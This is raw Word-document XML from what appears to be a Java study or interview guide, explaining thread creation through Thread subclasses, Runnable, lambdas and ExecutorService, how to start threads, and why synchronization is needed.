    <w:p w14:paraId="0AFAB057"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e class and call the start() method to begin executing the run() method in a separate thread.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E4B9EB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4613E9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Thread extends Thread {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04E3885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27F2DE1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2B3E88F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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="191A6F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2630E1A4" w14:textId="77777777" w:rsidR="00714449" w:rsidRPr="007E3724" w:rsidRDefault="00714449" w:rsidP="007E3724">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3C4D29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774CFD7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Thread thread = new MyThread();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FA3F4A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2FED766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3E4D93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3D6DCD80"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38717C0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Thread extends the Thread class and overrides the run() method.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74AFA17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thread, which invokes the run() method.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10D1F6F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2. By Implementing the Runnable Interface</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61FB7C0D"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second way to create a thread is by implementing the Runnable interface and passing it to a Thread object.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07D2EC46"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41BEDBF9"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class that implements the Runnable interface.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5209AF2E"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lement the run() method to define the task.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58925BBD"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read and pass the Runnable object to it.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01D64E4F"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all the start() method on the Thread object to begin execution.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1586EEB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748096E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Runnable implements Runnable {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="042B1F00"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0551044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101D603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 using Runnable...");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5200408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EB9014A" w14:textId="77777777" w:rsidR="00714449" w:rsidRPr="007E3724" w:rsidRDefault="00714449" w:rsidP="007E3724">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4A736A3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48BDD2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Runnable task = new MyRunnable();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="354D367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6E2EBF2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12683228"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258ED1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88C6CE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6E3B1383"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Runnable implements the Runnable interface and provides the implementation for the run() method.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B6885DE"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 thread = new Thread(task) creates a new Thread object and passes the Runnable instance (task) to it.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23E48A77"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run() method.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11A0B19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3. Using Lambda Expression with Runnable (Java 8 and later)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CCA278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f you are using Java 8 or later, you can use lambda expressions to simplify the creation of threads, especially when implementing the Runnable interface.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="525B43ED"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1249CB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LambdaThreadExample {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="341BE5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lastRenderedPageBreak/>
        <w:t xml:space="preserve">    public static void main(String[] args) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D3CF5F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Lambda expression...");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16B4D2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31EE2E2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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="196E6DA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C71A2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E7F1AA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D2DD7B4"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lambda expression () -&gt; System.out.println("Thread is running using Lambda expression...") implements the run() method of the Runnable interface.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02B8CADE"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Thread object is created and the start() method is invoked to run the task.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="064B5C2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4. Using ExecutorService (Java 5 and later)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="141AEB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 using ExecutorService:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78ED900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ervice;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CBB0501"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DBBD480" w14:textId="77777777" w:rsidR="00714449" w:rsidRPr="007E3724" w:rsidRDefault="00714449" w:rsidP="007E3724">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="69D403D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ExecutorServiceExample {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05A565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3542BA8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 executorService = Executors.newFixedThreadPool(2); // Pool with 2 threads</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BFB0A6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8CA520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ExecutorService...");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14B9BD1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4991B4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 task to be executed</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70B8B53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nother task</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="790D7FF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15F3C1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hutdown(); // Shut down the executor service</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="435665A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4862FB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0AE1C2AC"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1F5FAA2"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Executors.newFixedThreadPool(2) creates a thread pool with two threads.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="249CCA88"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ubmit() method submits the tasks to the thread pool.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E12874B"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hutdown() is called to stop the executor service after the tasks are completed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17DD1174"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Key Differences:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16F35461"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Thread Class:</w:t>
      </w:r>
      <w:r w:rsidRPr="007E3724">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Allows direct control over the thread but is less flexible for managing multiple threads.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FF8BA6C"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Runnable Interface:</w:t>
      </w:r>
      <w:r w:rsidRPr="007E3724">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> More flexible and decouples the task from the thread. It can be used with other threading mechanisms like thread pools.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54148904"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ExecutorService:</w:t>
      </w:r>
      <w:r w:rsidRPr="007E3724">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Provides a higher-level, more efficient mechanism for managing threads, especially in scenarios with multiple tasks.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32D938BE"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ummary:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5262A624"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extending Thread</w:t>
      </w:r>
      <w:r w:rsidRPr="007E3724">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Suitable for simple use cases where you don't need to reuse the task.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D8C9A1B"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implementing Runnable</w:t>
      </w:r>
      <w:r w:rsidRPr="007E3724">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: More flexible and reusable, good for passing tasks to different threads.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0600CE49"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Using ExecutorService</w:t>
      </w:r>
      <w:r w:rsidRPr="007E3724">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Ideal for managing a pool of threads in a more scalable and efficient manner.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2330CA63" w14:textId="41B0DCD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51" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="73C34ECF"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94" w:name="_Toc197867508"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>How to start a thread in java?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="294"/>
    </w:p>
    <w:p w14:paraId="233EFE16" w14:textId="54B55A37"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start a thread using the following two primary approaches:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42A65C9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033C24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o start a thread by extending the Thread class, you must follow these steps:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3558677A"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1B86909C"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 you want the thread to perform.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="146680A0"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begin executing the thread.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B612655"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19086B2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7303ED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B70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51E4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System.out.println("Thread is running...");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DBFCA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1CC1711" w14:textId="77777777" w:rsidR="00714449" w:rsidRPr="00136F15" w:rsidRDefault="00714449" w:rsidP="00136F15">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2D9DA5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13E6777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0B81A90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083E76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F5395E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4AAEDF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4C77691B"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 and overrides the run() method, which defines the task the thread will perform.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C0804E1"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called to initiate the thread. This triggers the run() method to execute.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AAFFDE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4CAD9DA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ternatively, you can create a thread by implementing the Runnable interface. This allows you to separate the thread logic from the thread creation and gives you more flexibility.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B85013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788D02CE"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54B198E3"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3C4326A4"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Runnable class and pass it to a Thread object.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="772E23D0"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n the Thread object to start the thread.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4020D24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62FE76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6CD2CB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3846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FD87B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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="164D2C6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9AD8E50" w14:textId="77777777" w:rsidR="00714449" w:rsidRPr="00136F15" w:rsidRDefault="00714449" w:rsidP="00136F15">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="023968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F6CF31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41B69B9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157BBF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768D52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C73E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5BE001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25167E19"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 and provides the implementation for the run() method.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AF055B4"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new thread and passes the Runnable object (task) to it.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2114C551"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used to begin the thread's execution.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34E26FB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Using Lambda Expressions (Java 8 and Later)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DE3C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re using Java 8 or later, you can simplify the creation of threads with lambda expressions, especially for implementing the Runnable interface.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5741B0D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 with Lambda Expression:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E2B504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LambdaThreadExample {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EB3718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3517620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unnable task = () -&gt; System.out.println("Thread is running using Lambda expression...");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D183E1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061213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E8BA29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DE90A1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0034033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666C5B6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lambda expression () -&gt; System.out.println("Thread is running using Lambda expression...") is a shorthand for implementing the Runnable interface.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65FB5303"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thread and passes the lambda expression (task) to it.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75AC851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tart() is called to start the thread.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="767A85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ummary of How to Start a Thread:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="556101C7"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y Extending Thread:</w:t>
      </w:r>
      <w:r w:rsidRPr="00136F15">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Directly create a thread by subclassing Thread and overriding the run() method.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="058E0DA2"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By Implementing Runnable:</w:t>
      </w:r>
      <w:r w:rsidRPr="00136F15">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Implement Runnable, create a Thread object with the Runnable instance, and call start().</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35ADA744"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ing Lambda (Java 8+):</w:t>
      </w:r>
      <w:r w:rsidRPr="00136F15">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Simplify Runnable implementation using a lambda expression and pass it to the Thread.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61F6A40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all cases, calling the start() method is essential to initiate the thread, which will internally invoke the run() method of the Thread or Runnable object.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C251EA3" w14:textId="0672E2C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2" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AA9A37E" w14:textId="77777777" w:rsidR="00F97833" w:rsidRPr="00CE4B95" w:rsidRDefault="00F97833">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="295" w:name="_Toc197867509"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>How to create threads in two different ways?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="295"/>
    </w:p>
    <w:p w14:paraId="1E4EF018" w14:textId="70CDB84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create threads in two primary ways:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="555D77F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7DD1631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extends the Thread class and override the run() method. The run() method defines the task the thread will perform when it starts.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64D2D04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068C2D4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4AB294BA"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hread's task.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40006E6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start the thread.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B9910A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A21CF2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2E160E2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1F2A8E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3EA94F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0067C8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Thread class...");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="288F9CC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87DF6CE" w14:textId="77777777" w:rsidR="00714449" w:rsidRPr="00136F15" w:rsidRDefault="00714449" w:rsidP="00136F15">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0371F86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465370C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n instance of the MyThread class</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A19F7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2147431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5E48B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BD668F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B8590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6E0E87BC"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E7A38C6"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he thread will perform.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71E0D8F8"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ing thread.start() will internally invoke the run() method, starting the thread.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59F0A8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007DA4B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599A9BB2"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1B53E265"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7C20F14A"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Runnable and pass it to a Thread object.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16D5915B"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f the Thread object to initiate the thread.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A361213"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276017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2C6CB7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1BE1C9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555C86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59928A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 interface...");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65DF4E9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2D6C9BA" w14:textId="77777777" w:rsidR="00714449" w:rsidRPr="00136F15" w:rsidRDefault="00714449" w:rsidP="00136F15">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4505BA5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7CB5AC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Runnable object</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F673C3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567E10B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D5393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 Creating a thread and passing the Runnable task</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A4E3B4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3644682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95CB92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7538A36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8E0845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7842288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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D193628"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o be executed by the thread.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B3F6D1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nable object (task) is passed to the Thread constructor, and start() is called to begin the thread execution.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B487C3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mparison and When to Use Each:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26D2562C"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tending Thread:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E40AA20"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If you don't need to extend any other class and want to directly create a thread by overriding the run() method.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41CB8D27"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Limitation:</w:t>
      </w:r>
      <w:r w:rsidRPr="00136F15">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Java does not support multiple inheritance, so if you need to extend another class, you cannot extend Thread.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38F2F101"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lementing Runnable:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B14730D"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When you need to create a thread but also need to extend another class (since Java supports only single inheritance).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A8EA2B3"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dvantage:</w:t>
      </w:r>
      <w:r w:rsidRPr="00136F15">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Allows you to separate the task from the thread logic, making it more flexible and reusable.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D0472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general, </w:t>
      </w:r>
      <w:r w:rsidRPr="00136F15">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>implementing Runnable</w:t>
      </w:r>
      <w:r w:rsidRPr="00136F15">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> is preferred when you need more flexibility, as it allows you to separate the task logic from the threading mechanism, while </w:t>
      </w:r>
      <w:r w:rsidRPr="00136F15">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>extending Thread</w:t>
      </w:r>
      <w:r w:rsidRPr="00136F15">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> is simpler if you don't need to extend any other class.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DFBB1D5" w14:textId="319EFCA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3" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="78450D78" w14:textId="77777777" w:rsidR="00884A56" w:rsidRPr="00CE4B95" w:rsidRDefault="00884A56">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="296" w:name="_Toc197867510"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>What is the necessity of thread synchronization?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="296"/>
    </w:p>
    <w:p w14:paraId="52E264A3" w14:textId="66BBA5C4"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Necessity of Thread Synchronization:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="574A50A2"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Data Inconsistency:</w:t>
      </w:r>
      <w:r w:rsidRPr="00136F15">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>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p>
    <w:p w14:paraId="0FCFD3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32EC0E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24F3E537" w14:textId="77777777" w:rsidR="00714449" w:rsidRPr="00136F15" w:rsidRDefault="00714449" w:rsidP="00136F15">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3BAD3D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0026051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4D9E8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66B59B1" w14:textId="77777777" w:rsidR="00714449" w:rsidRPr="00136F15" w:rsidRDefault="00714449" w:rsidP="00136F15">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6F5CCB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5607D0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04D4190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7D1E2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9F2410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Race Conditions:</w:t>
      </w:r>
      <w:r w:rsidRPr="00136F15">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> A </w:t>
      </w:r>
      <w:r w:rsidRPr="00136F15">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>race condition</w:t>
      </w:r>
      <w:r w:rsidRPr="00136F15">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>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Atomic Operations:</w:t>
      </w:r>
      <w:r w:rsidRPr="00136F15">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>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Maintaining Data Integrity:</w:t>
      </w:r>
      <w:r w:rsidRPr="00136F15">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>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nsuring Consistent Behavior in Multithreaded Applications:</w:t>
      </w:r>
      <w:r w:rsidRPr="00136F15">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>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Deadlock Prevention (to some extent):</w:t>
      </w:r>
      <w:r w:rsidRPr="00136F15">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>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How Thread Synchronization Works:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="329D1FE2" w14:textId="77777777" w:rsidR="00714449" w:rsidRPr="00136F15" w:rsidRDefault="00714449" w:rsidP="00136F15">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>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ynchronized Keyword:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50DCF120"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ynchronized keyword in Java is used to ensure that only one thread can execute a block of code or method at a time.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="471B322A"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t can be used to lock a method or a block of code to make it thread-safe.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7960516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Method Synchronization):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F205F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1805EF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36B5E552" w14:textId="77777777" w:rsidR="00714449" w:rsidRPr="00136F15" w:rsidRDefault="00714449" w:rsidP="00136F15">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
